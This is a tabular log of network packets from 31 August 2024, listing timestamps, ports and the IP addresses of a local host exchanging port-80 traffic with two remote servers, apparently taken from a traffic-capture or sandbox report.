Aug 31, 2024 15:44:21.429101944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.434669018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.434797049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.434937954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.434947014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.434963942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.434976101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.434979916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.434988022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.434999943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435012102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435019970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435053110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435132027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435142994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435153008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435163975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435174942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435179949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435188055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435199976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435199976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435208082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.435226917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435235977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.435277939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.436471939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436487913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436499119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436508894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436518908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436518908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.436531067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436537981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.436548948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436557055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436559916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.436584949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.436599016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.436882973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436894894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436906099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436916113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436927080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436937094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436948061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436955929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.436963081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.437007904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.438504934 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.438554049 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.438558102 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.438560963 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.438570976 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.438580036 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.438608885 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.487333059 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.487344980 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.487354994 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.487386942 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.487416029 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.488152027 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.488162994 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.488172054 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.488199949 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.488225937 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.489264965 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.489275932 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.489285946 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.489315987 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.489336967 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.489387035 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.489397049 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.489423990 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.489434958 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.512994051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513035059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513044119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513066053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.513089895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.513119936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513154030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513190985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.513220072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513261080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.513425112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513436079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513443947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513473034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.513494968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.513506889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.513659000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.514624119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.514635086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.514648914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.514678001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.514699936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.514765978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.514779091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.514787912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.514811993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.514823914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.514929056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515013933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515193939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515202999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515244961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515249968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515290022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515324116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515362024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515374899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515414000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515425920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515463114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515491009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515530109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515552044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515594006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515636921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515646935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515675068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515685081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515691996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515703917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515716076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515739918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515769005 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515774965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515857935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515873909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515885115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515894890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515898943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515912056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515921116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515922070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515930891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515933990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515961885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515971899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515981913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.515984058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.515994072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.516016960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.516041040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.516571045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517369986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517379999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517390013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517404079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517425060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517455101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517525911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517537117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517544985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517561913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517563105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517575026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517585039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517592907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517595053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517605066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517615080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517620087 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517628908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517628908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517640114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.517661095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.517679930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518563032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518573046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518611908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518615961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518656015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518687963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518697023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518732071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518835068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518845081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518855095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518863916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518872976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518874884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518883944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518894911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518902063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518910885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518923998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518928051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518935919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.518955946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.518968105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521254063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521265030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521275043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521312952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521348953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521406889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521416903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521425962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521435022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521456003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521482944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521811008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521821022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521864891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521878004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521913052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521924019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521943092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.521970034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.521989107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.522047997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522058964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522068024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522078037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522102118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.522130966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.522161961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522172928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522182941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522191048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522201061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522211075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.522216082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.522234917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.522243023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526130915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526146889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526158094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526166916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526176929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526181936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526187897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526192904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526202917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526226997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526241064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526343107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526352882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526362896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526371956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526385069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526396036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526401043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526406050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.526421070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.526439905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.529278994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529289961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529299021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529303074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529321909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529330969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529331923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.529341936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.529360056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.529371977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.529392004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.530050993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530061960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530071020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530088902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530100107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530102015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.530112028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530122042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.530122042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.530143023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.530150890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.530175924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.539952040 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.539961100 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.539971113 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.539994955 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.540000916 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.540030003 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.540219069 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.540229082 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.540271997 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.540410042 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.540420055 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.540431976 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.540463924 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.540498018 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.559899092 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:21.604146957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604203939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.604259968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604269028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604278088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604288101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604296923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604305983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.604306936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604319096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.604347944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.604360104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.605381012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605391979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605408907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605428934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605441093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605452061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605453014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.605463028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.605490923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.605503082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.605583906 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.605595112 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.605604887 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.605629921 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.605746031 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.606185913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606231928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606232882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606244087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606287003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606306076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606314898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606326103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606343985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606352091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606353045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606374979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606393099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606434107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606442928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606458902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606468916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606484890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606517076 CEST	80	49727	52.212.52.84	192.168.2.5
